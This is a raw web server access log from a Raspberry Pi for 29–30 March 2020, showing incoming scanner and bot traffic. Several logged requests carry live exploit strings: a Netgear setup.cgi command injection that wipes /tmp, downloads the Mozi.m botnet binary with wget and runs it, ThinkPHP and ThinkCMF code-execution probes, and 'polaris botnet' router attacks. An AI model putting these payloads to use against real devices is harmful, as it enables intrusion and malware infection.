Sun Mar 29 06:25:11 MDT 2020 06:25:11 up 33 days, 10:53, 1 user, load average: 0.55, 0.28, 0.21 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 33days 27:09 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 177.95.233.189 - - [29/Mar/2020:14:46:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 194.219.214.6 - - [29/Mar/2020:15:32:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 171.67.70.85 - - [29/Mar/2020:16:00:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 100.12.30.248 - - [29/Mar/2020:16:26:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 100.12.30.248 - - [29/Mar/2020:16:26:03 +0000] "GET / HTTP/1.1" 200 25000 "" "" 169.197.108.6 - - [29/Mar/2020:16:31:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 103.135.38.183 - - [29/Mar/2020:16:53:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 178.73.215.171 - - [29/Mar/2020:17:57:11 +0000] "GET / HTTP/1.0" 200 25000 "" "" 106.13.123.125 - - [29/Mar/2020:18:32:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 106.13.123.125 - - [29/Mar/2020:18:32:56 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:56 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:57 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:57 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:58 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:59 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:59 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:33:00 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:33:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 110.43.48.117 - - [29/Mar/2020:18:41:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.133.29 - - [29/Mar/2020:18:50:35 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 185.153.199.118 - - [29/Mar/2020:20:28:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 189.213.27.104 - - [29/Mar/2020:20:49:43 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 189.213.27.104 - - [29/Mar/2020:20:49:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.67.70.85 - - [29/Mar/2020:21:03:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 153.164.240.201 - - [29/Mar/2020:23:04:32 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0" 153.164.240.201 - - [29/Mar/2020:23:04:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [30/Mar/2020:00:20:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:20:37 +0000] "GET /favicon.ico HTTP/1.1" 304 0 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:20:52 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:20:56 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:21:25 +0000] "GET /ac0xl/logs/2020.03.29 HTTP/1.1" 200 5666 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 64.225.79.45 - - [30/Mar/2020:01:16:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 64.225.79.45 - - [30/Mar/2020:01:16:28 +0000] "GET / HTTP/1.0" 200 25000 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:58 +0000] "GET / HTTP/1.0" 200 25000 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.128.176 - - [30/Mar/2020:01:18:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 134.122.102.24 - - [30/Mar/2020:01:18:07 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 164.68.112.178 - - [30/Mar/2020:02:23:17 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" 83.97.20.33 - - [30/Mar/2020:02:45:08 +0000] "GET / HTTP/1.0" 200 25000 "" "" 94.140.114.53 - - [30/Mar/2020:02:48:17 +0000] "GET / HTTP/1.0" 200 25000 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" 46.174.115.14 - - [30/Mar/2020:03:36:08 +0000] "GET /test.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 46.174.115.14 - - [30/Mar/2020:03:36:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 46.174.115.14 - - [30/Mar/2020:03:36:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.67.70.85 - - [30/Mar/2020:03:47:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 185.141.105.166 - - [30/Mar/2020:04:17:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 162.243.129.83 - - [30/Mar/2020:04:38:47 +0000] "GET /manager/text/list HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 223.155.82.187 - - [30/Mar/2020:04:59:36 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 0 "" "" 186.31.68.157 - - [30/Mar/2020:05:15:54 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 186.31.68.157 - - [30/Mar/2020:05:15:54 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 173.249.51.194 - - [30/Mar/2020:05:19:57 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 60.191.52.254 - - [30/Mar/2020:06:19:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.52.254 - - [30/Mar/2020:06:19:34 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 197.232.2.18 - - [30/Mar/2020:09:34:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:37:28 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:49:56 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:49:57 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:56:22 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 167.114.89.197 - - [30/Mar/2020:10:00:51 +0000] "HEAD /1Jlv HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" 171.67.70.85 - - [30/Mar/2020:10:01:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 51.38.57.199 - - [30/Mar/2020:10:17:38 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 162.243.128.177 - - [30/Mar/2020:12:07:14 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" Mon Mar 30 06:25:06 MDT 2020 06:25:06 up 34 days, 10:53, 1 user, load average: 0.27, 0.23, 0.24 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 34days 28:07 1.96s /usr/bin/lxsession -s LXDE-pi -e LXDE